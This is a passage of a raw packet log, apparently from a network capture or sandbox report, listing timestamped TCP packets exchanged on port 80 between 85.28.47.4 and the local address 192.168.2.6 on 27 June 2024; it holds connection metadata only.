                                                                Jun 27, 2024 05:58:10.874042988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874054909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874068022 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874068975 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874082088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874089956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874094963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874109030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874114037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874120951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874134064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874135971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874154091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874166012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874170065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874178886 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874188900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874201059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874205112 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874212980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874226093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874248981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874936104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874948978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874959946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874972105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874980927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.874984026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.874999046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875004053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875011921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875022888 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875025034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875039101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875052929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875058889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875065088 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875077963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875092030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875093937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875103951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875112057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875117064 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875128984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875138998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875159025 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875869989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875889063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875900984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875912905 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875912905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875926018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875938892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875951052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875952959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875957966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875968933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875982046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.875993013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.875993013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876000881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876012087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876024961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876024961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876036882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876049995 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876070023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876104116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876812935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876836061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876848936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876853943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876861095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876873016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876885891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876897097 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876900911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876913071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876924992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876928091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876936913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876946926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876957893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876957893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876971006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876981974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.876983881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.876996040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877007008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877008915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877018929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877033949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877055883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877685070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877705097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877717018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877726078 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877728939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877743006 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877759933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877763987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877772093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877785921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877795935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.877798080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.877826929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.958707094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958755970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958770037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958805084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.958844900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.958867073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958879948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958892107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958904982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.958908081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.958929062 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.958965063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959115982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959129095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959141016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959151030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959153891 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959167957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959192991 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959225893 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959371090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959383011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959395885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959407091 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959407091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959419966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959453106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959506989 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959635973 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959647894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959661961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959671974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959672928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959708929 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959841013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959852934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959865093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959877014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959877968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959888935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959898949 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959902048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959913969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.959933996 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.959965944 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960324049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960335016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960349083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960355997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960361958 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960374117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960386038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960392952 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960398912 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960411072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960422993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960432053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960436106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960448027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960453987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960459948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960488081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960500002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.960957050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960969925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960982084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960995913 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.960995913 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961009026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961019993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961030006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961033106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961045980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961052895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961059093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961071968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961076975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961086035 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961095095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961131096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961596012 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961607933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961618900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961631060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961635113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961642981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961653948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961661100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961666107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961678028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961689949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961697102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961704016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961715937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961720943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961728096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961740017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961740971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961751938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961766005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961774111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961777925 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961791039 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.961813927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.961833954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962542057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962553978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962563992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962577105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962584019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962588072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962603092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962614059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962626934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962630033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962639093 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962651014 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962651968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962663889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962671995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962677002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962690115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962693930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962702036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962712049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962714911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962727070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962738991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962749958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.962754011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.962789059 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963470936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963481903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963493109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963504076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963506937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963515043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963526964 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963536978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963548899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963548899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963560104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963572025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963583946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963584900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963597059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963606119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963608980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963619947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963629961 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963632107 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963644028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963651896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963656902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963668108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.963673115 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.963696957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.964353085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964365005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964375019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964386940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964387894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.964397907 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964410067 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964422941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964426041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.964437962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964451075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964458942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.964468002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:10.964490891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:10.964504004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046567917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046628952 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046641111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046658993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046701908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046720028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046730042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046741962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046777964 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046789885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046789885 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046907902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046921015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046931982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046942949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046948910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046962023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046966076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.046974897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.046991110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047254086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047264099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047275066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047275066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047286987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047288895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047302008 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047312021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047336102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047534943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047547102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047558069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047564030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047569036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047588110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047595978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047606945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047610998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047620058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047631979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047636032 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047642946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047655106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047661066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047677040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.047677040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.047700882 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048229933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048242092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048253059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048264027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048264980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048274994 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048283100 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048285961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048297882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048307896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048310041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048321962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.048331976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048350096 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.048814058 CEST804971185.28.47.4192.168.2.6
